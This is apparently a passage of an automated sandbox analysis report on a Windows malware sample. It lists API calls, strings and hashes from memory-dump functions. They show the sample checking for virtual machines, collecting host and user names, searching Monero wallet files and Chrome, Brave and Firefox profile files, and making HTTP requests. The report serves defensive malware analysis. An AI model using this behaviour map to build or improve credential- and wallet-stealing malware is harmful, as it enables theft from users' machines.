                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CrackInternetlstrlen
                      • String ID: <
                      • API String ID: 1274457161-4251816714
                      • Opcode ID: d848d08b347225a9497ec311338d721512b4568ee7c6ac5dcdd9bb420c653a05
                      • Instruction ID: edd66646892c595c9eac4ff7dc96356dee268a44041d651a7ae58e707aab177c
                      • Opcode Fuzzy Hash: d848d08b347225a9497ec311338d721512b4568ee7c6ac5dcdd9bb420c653a05
                      • Instruction Fuzzy Hash: 5F213EB1D00209ABDF14DFA4E845ADE7B75FF45320F108626F915A7281EB706A05CB81

                      Control-flow Graph

                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C6280: InternetOpenA.WININET(001E0DFE,00000001,00000000,00000000,00000000), ref: 001C62E1
                        • Part of subcall function 001C6280: StrCmpCA.SHLWAPI(?,00E3EA28), ref: 001C6303
                        • Part of subcall function 001C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C6335
                        • Part of subcall function 001C6280: HttpOpenRequestA.WININET(00000000,GET,?,00E3E3A0,00000000,00000000,00400100,00000000), ref: 001C6385
                        • Part of subcall function 001C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001C63BF
                        • Part of subcall function 001C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C63D1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5228
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                      • String ID: ERROR$ERROR
                      • API String ID: 3287882509-2579291623
                      • Opcode ID: a2af049968789feb381dd098d31c91f7b5f0f733f73922e7a4419e5c5e7805e8
                      • Instruction ID: 6b0851df024d570ee83375b9463608ad444015e55776f914caec84c7662da607
                      • Opcode Fuzzy Hash: a2af049968789feb381dd098d31c91f7b5f0f733f73922e7a4419e5c5e7805e8
                      • Instruction Fuzzy Hash: FC110030910148ABCB14FF64DD52EED7339AF70300FC04159F81A5B692EF71AB09D695
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001C123E
                      • ExitProcess.KERNEL32 ref: 001C1294
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 803317263-2766056989
                      • Opcode ID: bd5aa85a939fa23bccdf5f5469f3fcfa27b1a0be3953e86d6baf9f7ff91a0cfc
                      • Instruction ID: 61040eea1f1da2640a96c8256310a6e24c66d23e82c411431326c6ee297c3a2b
                      • Opcode Fuzzy Hash: bd5aa85a939fa23bccdf5f5469f3fcfa27b1a0be3953e86d6baf9f7ff91a0cfc
                      • Instruction Fuzzy Hash: A5016DB0D80308BAEB10EBE0DC49FAEBB78AB25705F208059F705B72C1D77495418799
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7910
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D7917
                      • GetComputerNameA.KERNEL32(?,00000104), ref: 001D792F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateComputerNameProcess
                      • String ID:
                      • API String ID: 1664310425-0
                      • Opcode ID: 7e1c7723826807b1fb228f38aa319878f9278e98de2c17a90a89c88d1423890a
                      • Instruction ID: 58cd965297c62804d37abc2e6c033d49b70b734a17c05f1dcf54022e3a9794b9
                      • Opcode Fuzzy Hash: 7e1c7723826807b1fb228f38aa319878f9278e98de2c17a90a89c88d1423890a
                      • Instruction Fuzzy Hash: 1D0162B2944308EBC704EF95DD45BAEBBB8F704B25F10422AE545A3380D3745904CBA1
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001C112B
                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 001C1132
                      • ExitProcess.KERNEL32 ref: 001C1143
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$AllocCurrentExitNumaVirtual
                      • String ID:
                      • API String ID: 1103761159-0
                      • Opcode ID: 219544a1f1129a3b77173bee66406dc3b07ca09323dcf3a3980a5f000786b7fe
                      • Instruction ID: 3d2d2482cb582aabc201830e5967484baf845bebe06df485a3dcb9c86b473bd2
                      • Opcode Fuzzy Hash: 219544a1f1129a3b77173bee66406dc3b07ca09323dcf3a3980a5f000786b7fe
                      • Instruction Fuzzy Hash: 6AE0E671985308FBE7106BA09D0AF097678AB15B01F104154F709761D1D7B56650969D
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001C10B3
                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001C10F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: 17a939e22e1aa02aaa94616b9ac78de7dd0bae042a0c7b231831e468c1221e73
                      • Instruction ID: 43bcbe6808e8632941de006a5b51afa8db644ba291e92c2da1c0baacd52e2f8c
                      • Opcode Fuzzy Hash: 17a939e22e1aa02aaa94616b9ac78de7dd0bae042a0c7b231831e468c1221e73
                      • Instruction Fuzzy Hash: 42F0E271681308BBE714AAA4AC59FAEB7E8E705B15F305458F504E3280D6719E00CAA5
                      APIs
                        • Part of subcall function 001D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7910
                        • Part of subcall function 001D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 001D7917
                        • Part of subcall function 001D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 001D792F
                        • Part of subcall function 001D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001C11B7), ref: 001D7880
                        • Part of subcall function 001D7850: RtlAllocateHeap.NTDLL(00000000), ref: 001D7887
                        • Part of subcall function 001D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001D789F
                      • ExitProcess.KERNEL32 ref: 001C11C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                      • String ID:
                      • API String ID: 3550813701-0
                      • Opcode ID: 82e4113e2445854a60557f74b01a94a5480865b4db56b0a2769fd70d9a769aa7
                      • Instruction ID: a283d6094b48dbd68e8665895b993214926aafe130047504ce0a5bd0ed67cd1c
                      • Opcode Fuzzy Hash: 82e4113e2445854a60557f74b01a94a5480865b4db56b0a2769fd70d9a769aa7
                      • Instruction Fuzzy Hash: C4E012B595430163CA0073F4AD0AF2A329C5B35349F08083AFA05E3343FB79F810956A
                      APIs
                      • wsprintfA.USER32 ref: 001D38CC
                      • FindFirstFileA.KERNEL32(?,?), ref: 001D38E3
                      • lstrcat.KERNEL32(?,?), ref: 001D3935
                      • StrCmpCA.SHLWAPI(?,001E0F70), ref: 001D3947
                      • StrCmpCA.SHLWAPI(?,001E0F74), ref: 001D395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001D3C67
                      • FindClose.KERNEL32(000000FF), ref: 001D3C7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                      • API String ID: 1125553467-2524465048
                      • Opcode ID: 04681d7930a513cc878278ffa3becd08d73bfa5ba1f482f203e60f1c1af33b54
                      • Instruction ID: 4461e5c6d42108e221b41b9ba63afb6839398d2c24da5fb9e8171d68c0788b1a
                      • Opcode Fuzzy Hash: 04681d7930a513cc878278ffa3becd08d73bfa5ba1f482f203e60f1c1af33b54
                      • Instruction Fuzzy Hash: 77A161B2A00308ABDB24EFA4DD85FEE7378BF58300F044599E51DA6141EB759B94CF62
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • FindFirstFileA.KERNEL32(00000000,?,001E0B32,001E0B2B,00000000,?,?,?,001E13F4,001E0B2A), ref: 001CBEF5
                      • StrCmpCA.SHLWAPI(?,001E13F8), ref: 001CBF4D
                      • StrCmpCA.SHLWAPI(?,001E13FC), ref: 001CBF63
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001CC7BF
                      • FindClose.KERNEL32(000000FF), ref: 001CC7D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                      • API String ID: 3334442632-726946144
                      • Opcode ID: 56888f76015318d567baf60b2d4794dc4c817567173a41dc16a25481df5f16e6
                      • Instruction ID: 5d440650d9afe22269974f0b09d7325150928002ecc91e6a037a870e2ae2ee02
                      • Opcode Fuzzy Hash: 56888f76015318d567baf60b2d4794dc4c817567173a41dc16a25481df5f16e6
                      • Instruction Fuzzy Hash: 68426572910114ABCB14FB70DD96EEE737DAF64300F804569F90AA6281EF349F49CB96
                      APIs
                      • wsprintfA.USER32 ref: 001D492C
                      • FindFirstFileA.KERNEL32(?,?), ref: 001D4943
                      • StrCmpCA.SHLWAPI(?,001E0FDC), ref: 001D4971
                      • StrCmpCA.SHLWAPI(?,001E0FE0), ref: 001D4987
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001D4B7D
                      • FindClose.KERNEL32(000000FF), ref: 001D4B92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$%s\%s$%s\*
                      • API String ID: 180737720-445461498
                      • Opcode ID: 1aaf400b2273b4065d7d710ed087df150013bee714acd782618ae1de795e9bf1
                      • Instruction ID: 88271e41953303d751eedc97ec8f5d0b307ef1151e849d075bb1108da632243e
                      • Opcode Fuzzy Hash: 1aaf400b2273b4065d7d710ed087df150013bee714acd782618ae1de795e9bf1
                      • Instruction Fuzzy Hash: A06185B2900218ABCB24EBA0DD49FEE737CBB58700F04859DF509A6141EB71EB95CF95
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001D4580
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D4587
                      • wsprintfA.USER32 ref: 001D45A6
                      • FindFirstFileA.KERNEL32(?,?), ref: 001D45BD
                      • StrCmpCA.SHLWAPI(?,001E0FC4), ref: 001D45EB
                      • StrCmpCA.SHLWAPI(?,001E0FC8), ref: 001D4601
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001D468B
                      • FindClose.KERNEL32(000000FF), ref: 001D46A0
                      • lstrcat.KERNEL32(?,00E3EAB8), ref: 001D46C5
                      • lstrcat.KERNEL32(?,00E3DA40), ref: 001D46D8
                      • lstrlen.KERNEL32(?), ref: 001D46E5
                      • lstrlen.KERNEL32(?), ref: 001D46F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                      • String ID: %s\%s$%s\*
                      • API String ID: 671575355-2848263008
                      • Opcode ID: 2ecf64059963630326f3d8d1be13675cb67a6154dbf1603a9cfda91fdeb91f2e
                      • Instruction ID: c5f856407e258a052ae2599d85dd7bb0ee5b80aaa465ded0801dd50d23996156
                      • Opcode Fuzzy Hash: 2ecf64059963630326f3d8d1be13675cb67a6154dbf1603a9cfda91fdeb91f2e
                      • Instruction Fuzzy Hash: DC5187B6540318ABCB24FB70DD89FED737CAB58300F404599F649A2150EB74DB948F96
                      APIs
                      • wsprintfA.USER32 ref: 001D3EC3
                      • FindFirstFileA.KERNEL32(?,?), ref: 001D3EDA
                      • StrCmpCA.SHLWAPI(?,001E0FAC), ref: 001D3F08
                      • StrCmpCA.SHLWAPI(?,001E0FB0), ref: 001D3F1E
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001D406C
                      • FindClose.KERNEL32(000000FF), ref: 001D4081
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$h
                      • API String ID: 180737720-3418665255
                      • Opcode ID: 8929d80d2bf58d2e1bf5e8093fa19bff467f998867212a4c16676e300cba3532
                      • Instruction ID: 36d819330a3fe5cbfa67e1748d38e914d685f96889a106bcc56d42a74520b081
                      • Opcode Fuzzy Hash: 8929d80d2bf58d2e1bf5e8093fa19bff467f998867212a4c16676e300cba3532
                      • Instruction Fuzzy Hash: D05196B6900318ABCB24FBB0DD85EEE737CBB58300F008599B659A2140DB75DB958F95
                      APIs
                      • wsprintfA.USER32 ref: 001CED3E
                      • FindFirstFileA.KERNEL32(?,?), ref: 001CED55
                      • StrCmpCA.SHLWAPI(?,001E1538), ref: 001CEDAB
                      • StrCmpCA.SHLWAPI(?,001E153C), ref: 001CEDC1
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001CF2AE
                      • FindClose.KERNEL32(000000FF), ref: 001CF2C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\*.*
                      • API String ID: 180737720-1013718255
                      • Opcode ID: 8d687ff4be9061345a33a43469a9d63b62a70fe7df2096d34d3b24de0beeb19a
                      • Instruction ID: dc9e6e05c8c4ab6709d725fe156828a66ad3b960af8feb026d6509c95f429fcb
                      • Opcode Fuzzy Hash: 8d687ff4be9061345a33a43469a9d63b62a70fe7df2096d34d3b24de0beeb19a
                      • Instruction Fuzzy Hash: 35E1F6719111589ADB58FB60CC92EEE733CAF74301F8041EAB40A62152EF306F8ADF56
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001E15B8,001E0D96), ref: 001CF71E
                      • StrCmpCA.SHLWAPI(?,001E15BC), ref: 001CF76F
                      • StrCmpCA.SHLWAPI(?,001E15C0), ref: 001CF785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001CFAB1
                      • FindClose.KERNEL32(000000FF), ref: 001CFAC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: prefs.js
                      • API String ID: 3334442632-3783873740
                      • Opcode ID: 1df9f25bfe117f878832f95d010fb94f5fa2565fa8889998fec58aef569bd07f
                      • Instruction ID: a98f52f0f966995bf1ddefe405e60afa24da86f27c215506d3ab1f3b4b008df2
                      • Opcode Fuzzy Hash: 1df9f25bfe117f878832f95d010fb94f5fa2565fa8889998fec58aef569bd07f
                      • Instruction Fuzzy Hash: D9B145719002549BCB24FF64DC95FEE7379AF64300F8085ADA80A97251EF319B4ACF96
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: D=Xw$X[=$Z=$a~$cwg$g^wO$wA/$xnC$V~o$e7/$zy
                      • API String ID: 0-3030764929
                      • Opcode ID: 152fe010d69f4655c8bd94256e98664688d1f2ed624a69a33027ca8a6e6543d6
                      • Instruction ID: 56759293292a1e1c35a89334c596a7f7a2a95cd1bfbda0ab826b25a731d84210
                      • Opcode Fuzzy Hash: 152fe010d69f4655c8bd94256e98664688d1f2ed624a69a33027ca8a6e6543d6
                      • Instruction Fuzzy Hash: B9B24BF36082049FE3046E2DEC8567AFBD9EFD4320F16863DEAC5C7744E93598058696
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001E510C,?,?,?,001E51B4,?,?,00000000,?,00000000), ref: 001C1923
                      • StrCmpCA.SHLWAPI(?,001E525C), ref: 001C1973
                      • StrCmpCA.SHLWAPI(?,001E5304), ref: 001C1989
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001C1D40
                      • DeleteFileA.KERNEL32(00000000), ref: 001C1DCA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001C1E20
                      • FindClose.KERNEL32(000000FF), ref: 001C1E32
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 1415058207-1173974218
                      • Opcode ID: 4499aae7d39a0aad838535cfed8a3ed324d856b492386231e076b942e76157a1
                      • Instruction ID: 964470a5bacf9d5b5ac160f75110b0ab6e98accd27796b69f8b457517cde5eea
                      • Opcode Fuzzy Hash: 4499aae7d39a0aad838535cfed8a3ed324d856b492386231e076b942e76157a1
                      • Instruction Fuzzy Hash: 121247719501589BCB19FB60CCA6EEE7378AF74301FC0419AB50A62291EF306F89DF95
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,001E0C2E), ref: 001CDE5E
                      • StrCmpCA.SHLWAPI(?,001E14C8), ref: 001CDEAE
                      • StrCmpCA.SHLWAPI(?,001E14CC), ref: 001CDEC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001CE3E0
                      • FindClose.KERNEL32(000000FF), ref: 001CE3F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                       • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID: \*.*
                      • API String ID: 2325840235-1173974218
                      • Opcode ID: cd28f9198bd80aded5ac6bec978e009426e997b3873533ab4f3556e7a22c67e1
                      • Instruction ID: 1124ace908988f3ddda8beda2e519476f274363886babafd1453db047a3f1229
                      • Opcode Fuzzy Hash: cd28f9198bd80aded5ac6bec978e009426e997b3873533ab4f3556e7a22c67e1
                      • Instruction Fuzzy Hash: 10F1A0718501689ADB19EB60DCA5EEE7378BF34301FC041EAB40A62191EF306F89DF56
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001E14B0,001E0C2A), ref: 001CDAEB
                      • StrCmpCA.SHLWAPI(?,001E14B4), ref: 001CDB33
                      • StrCmpCA.SHLWAPI(?,001E14B8), ref: 001CDB49
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001CDDCC
                      • FindClose.KERNEL32(000000FF), ref: 001CDDDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                       • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: b4287a481f0c5099730c3f110a3235b3e57d39f48514e55985c8b86f1467d97b
                      • Instruction ID: a1baeaa42b66428280e1088d4dd914331f0b56d7d90f903befbd9d5f98b4583b
                      • Opcode Fuzzy Hash: b4287a481f0c5099730c3f110a3235b3e57d39f48514e55985c8b86f1467d97b
                      • Instruction Fuzzy Hash: 0B914872900104A7CB14FBB0ED56EED737DAFA4300F808569F90A96281EF35DB19CB96
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                       • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
